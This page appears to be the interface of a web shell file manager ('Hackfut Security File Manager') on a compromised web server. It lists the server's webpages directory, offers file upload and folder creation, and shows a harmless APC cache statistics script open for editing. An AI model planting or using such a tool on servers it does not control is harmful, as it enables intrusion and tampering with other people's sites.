Hackfut Security File Manager
Current Path:
/mnt/ceph/services/webpages
mnt
/
ceph
/
services
/
webpages
/
📁
..
📁
0
📁
1
📁
2
📁
3
📁
4
📁
5
📁
6
📁
7
📁
8
📁
9
📁
a
📁
album
📄
apc.php
(45.07 KB)
📄
apc_stats.php
(1.15 KB)
📁
b
📁
c
📁
d
📁
e
📁
f
📁
g
📁
h
📁
hSecurity
📄
healthcheck.php
(2.06 KB)
📁
i
📁
isp
📁
j
📁
k
📁
l
📁
m
📄
mychk.php
(155 B)
📁
n
📁
o
📁
p
📁
parked
📁
parked.netapp
📄
parked.tar.gz
(915.07 KB)
📁
q
📁
r
📁
s
📁
stalepages
📁
t
📁
u
📁
unsupported
📁
util
📁
v
📁
w
📁
x
📁
y
📁
z
Editing: apc_stats.php
<?php /** * Retrieve APC statistics * * @author Alan Woolley <alan@armedpineapple.co.uk> * @copyright 2013 Alan Woolley * @license MIT * @version 1.0 * @link http://www.github.com/alanwoolley/apc-cacti-templates */ $fileCacheInfo = apc_cache_info(); $userCacheInfo = apc_cache_info('user'); $memoryInfo = apc_sma_info(); function printvar($name, $value) { print $name . ":" . $value . " "; } printvar("file_entries", $fileCacheInfo['num_entries']); printvar("file_size", $fileCacheInfo['mem_size']); printvar("file_hits", $fileCacheInfo['num_hits']); printvar("file_misses", $fileCacheInfo['num_misses']); printvar("file_inserts", $fileCacheInfo['num_inserts']); printvar("user_entries", $userCacheInfo['num_entries']); printvar("user_size", $userCacheInfo['mem_size']); printvar("user_hits", $userCacheInfo['num_hits']); printvar("user_misses", $userCacheInfo['num_misses']); printvar("user_inserts", $userCacheInfo['num_inserts']); printvar("available_memory", $memoryInfo['avail_mem']); printvar("segment_size", $memoryInfo['seg_size']); printvar("number_of_segments", $memoryInfo['num_seg']); printvar("uptime", time() - $fileCacheInfo['start_time']); ?>
Upload File
Create Folder